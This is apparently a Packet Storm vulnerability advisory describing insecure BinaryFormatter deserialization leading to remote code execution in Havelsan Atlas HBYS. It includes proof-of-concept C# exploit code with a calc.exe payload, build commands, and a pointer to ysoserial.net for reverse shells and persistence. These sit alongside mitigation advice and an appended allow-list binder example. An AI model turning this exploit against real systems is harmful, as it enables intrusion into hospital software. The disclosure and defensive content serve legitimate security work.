Atlas (Havelsan) Insecure Deserialization

Published: 14 Apr 2025 | Type: packetstorm | Source: packetstorm.news

Havelsan Atlas HBYS vulnerable to insecure deserialization allowing remote code execution.

# Exploit Title: Havelsan Atlas HBYS - Insecure Deserialization RCE
# Date: 2025-04-14
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://github.com/havelsan/atlas
# Version: latest
# Tested on: Windows 10 - 64bit
# CVE: N/A

## 🔍 Havelsan Atlas HBYS (.NET BinaryFormatter Deserialization RCE Vulnerability Analysis)

### 📌 Application:
- **Project Name**: Havelsan Atlas HBYS – [https://github.com/havelsan/atlas](https://github.com/havelsan/atlas)
- **Technology**: C# / ASP.NET / .NET Framework
- **Vulnerability Type**: Insecure Deserialization (BinaryFormatter)
- **Affected Class**: `TTObjectClasses.HSBSServis+WebMethods`
- **Vulnerable File**: `HSBSServis.hvl.cs`
- **Vulnerable Method**: `AHB_STOK_GIRISI_GETIRSync`

---

### 1️⃣ Vulnerability Discovery

```csharp
public static AHB_STOK_GIRIS_LISTESI AHB_STOK_GIRISI_GETIRSync(Guid siteID, USER user, DateTime Tarih, bool TarihSpecified)
{
    return (AHB_STOK_GIRIS_LISTESI) TTMessageFactory.SyncCall(
        siteID,
        new Guid("..."),
        ...,
        "TTObjectClasses.HSBSServis+WebMethods, TTObjectClasses",
        "AHB_STOK_GIRISI_GETIRSync_ServerSide",
        user, Tarih, TarihSpecified
    );
}
```

> 🧨 The `user` parameter is passed to the `SyncCall(...)` method, which internally performs deserialization using **BinaryFormatter**. This allows arbitrary objects to be loaded and executed, leading to **Remote Code Execution (RCE)**.

---

### 2️⃣ Root Cause of the Vulnerability

`.NET BinaryFormatter` accepts any object that has the same class and namespace name, even if it originates from a different assembly. Additionally:
- The deserialization process does not enforce type safety.
- If the attacker’s class implements `IObjectReference`, its `GetRealObject()` method is **automatically invoked** during deserialization.

---

### 3️⃣ PoC Source Code

---

#### 🔥 3.1 Exploit Class (`USER.cs`)
```csharp
using System;
using System.Diagnostics;
using System.Runtime.Serialization;

[Serializable]
public class USER : IObjectReference
{
    public object GetRealObject(StreamingContext context)
    {
        Console.WriteLine("[!] Exploit triggered!");
        Process.Start("calc.exe"); // Code execution occurs here
        return this;
    }
}
```

---

#### ⚙️ 3.2 Payload Generator (`GeneratePayload.cs`)
```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

public class GeneratePayload
{
    public static void Main(string[] args)
    {
        USER user = new USER();
        using (FileStream fs = new FileStream("payload.bin", FileMode.Create))
        {
            BinaryFormatter bf = new BinaryFormatter();
            bf.Serialize(fs, user);
            Console.WriteLine("[+] payload.bin has been created.");
        }
    }
}
```

---

#### 🧪 3.3 Deserialization Trigger (`TestDeserialize.cs`)
```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

public class TestDeserialize
{
    public static void Main(string[] args)
    {
        Console.WriteLine("[*] Reading payload.bin...");
        using (FileStream fs = new FileStream("payload.bin", FileMode.Open))
        {
            BinaryFormatter bf = new BinaryFormatter();
            var user = (USER)bf.Deserialize(fs); // ← Trigger occurs here
            Console.WriteLine("[+] Deserialization completed successfully!");
        }
    }
}
```

---

### 4️⃣ Compilation and Exploitation Commands

#### 🔧 1. Compile the malicious class as a DLL:
```bash
csc /target:library /out:ExploitLib.dll USER.cs
```

#### 🔧 2. Generate the payload:
```bash
csc /reference:ExploitLib.dll /out:GeneratePayload.exe GeneratePayload.cs
GeneratePayload.exe
```

#### 🔧 3. Trigger deserialization:
```bash
csc /reference:ExploitLib.dll /out:TestDeserialize.exe TestDeserialize.cs
TestDeserialize.exe
```

✅ If everything works correctly → **`calc.exe` should be executed**
✅ This demonstrates a **full Remote Code Execution** scenario.

---

### 💥 How the Vulnerability Was Confirmed

- The `SyncCall(...)` method deserializes the `USER` object coming from an untrusted source.
- An attacker can craft a fake `USER` class with the same name and namespace.
- Upon deserialization, the `IObjectReference.GetRealObject()` method is automatically executed.
- Arbitrary code (e.g., `calc.exe`) was successfully launched.
- Therefore, **full RCE has been proven**.

---

### 🔐 Mitigation Recommendations

- Avoid using `BinaryFormatter` completely.
- Instead, use safer alternatives such as:
  - `System.Text.Json`
  - `DataContractSerializer`
  - `XmlSerializer`
- Implement strict type whitelisting for deserialization.
- Avoid using runtime loading APIs like `Assembly.Load`, `Activator.CreateInstance`, and `MethodInfo.Invoke` on user-supplied data.
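One way to implement the type whitelisting recommended above, which also makes the `GetRealObject()` timing from section 2 visible, as an added example that is not part of the advisory or of the Havelsan code: a `SerializationBinder` that admits only the types the service expects and rejects everything else while the type is still a name in the stream. It assumes .NET Framework, where `BinaryFormatter` is still available, a hypothetical `SafeUser` DTO standing in for the real service contract, and a harmless `USER` stand-in whose hook only records that it ran.

```csharp
using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

// Stand-in for the advisory's attacker-controlled class; the hook only records that it ran.
[Serializable]
public sealed class USER : IObjectReference
{
    public static bool HookRan;
    public object GetRealObject(StreamingContext ctx) { HookRan = true; return this; }
}

// Hypothetical DTO the service legitimately expects on the wire.
[Serializable] public sealed class SafeUser { public string Name; }

// Allow-list binder: the stream may only name the types listed here. Anything else is rejected
// while the type is still a name in the stream, before any object exists, so GetRealObject() never runs.
public sealed class AllowListBinder : SerializationBinder
{
    static readonly Type[] Allowed = { typeof(SafeUser) };
    public override Type BindToType(string assemblyName, string typeName)
    {
        foreach (var t in Allowed) if (t.FullName == typeName) return t;
        // Throw, do not return null: on null BinaryFormatter falls back to its own type resolution.
        throw new SerializationException("Rejected type '" + typeName + "' from '" + assemblyName + "'");
    }
}

public static class BinderDemo
{
    static byte[] Serialize(object o)
    { using (var ms = new MemoryStream()) { new BinaryFormatter().Serialize(ms, o); return ms.ToArray(); } }

    // Deserializes with the given binder and reports whether the USER hook fired.
    public static bool HookFires(byte[] payload, SerializationBinder binder)
    {
        USER.HookRan = false;
        try { new BinaryFormatter { Binder = binder }.Deserialize(new MemoryStream(payload)); }
        catch (SerializationException e) { Console.WriteLine("[-] blocked: " + e.Message); }
        return USER.HookRan;
    }

    public static void Main()
    {
        byte[] evil = Serialize(new USER()), good = Serialize(new SafeUser { Name = "alice" });
        Console.WriteLine("no binder  -> hook ran: " + HookFires(evil, null));
        Console.WriteLine("allow-list -> hook ran: " + HookFires(evil, new AllowListBinder()));
        var ok = (SafeUser)new BinaryFormatter { Binder = new AllowListBinder() }.Deserialize(new MemoryStream(good));
        Console.WriteLine("allow-list -> SafeUser still loads: " + ok.Name);
    }
}
```

Without a binder the hook fires; with `AllowListBinder` the `USER` payload is refused in `BindToType` and the hook never runs, while the `SafeUser` payload still deserializes. The binder is a containment measure for code that cannot yet migrate; removing `BinaryFormatter`, as the first bullet says, remains the actual fix.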
    
---

### 🧪 Additional Notes

- This vulnerability can be further exploited using `ysoserial.net` to execute PowerShell, reverse shells, or establish persistence.
- Similar insecure deserialization issues are common in SOAP/WCF and internal service bus implementations in enterprise .NET environments.

---
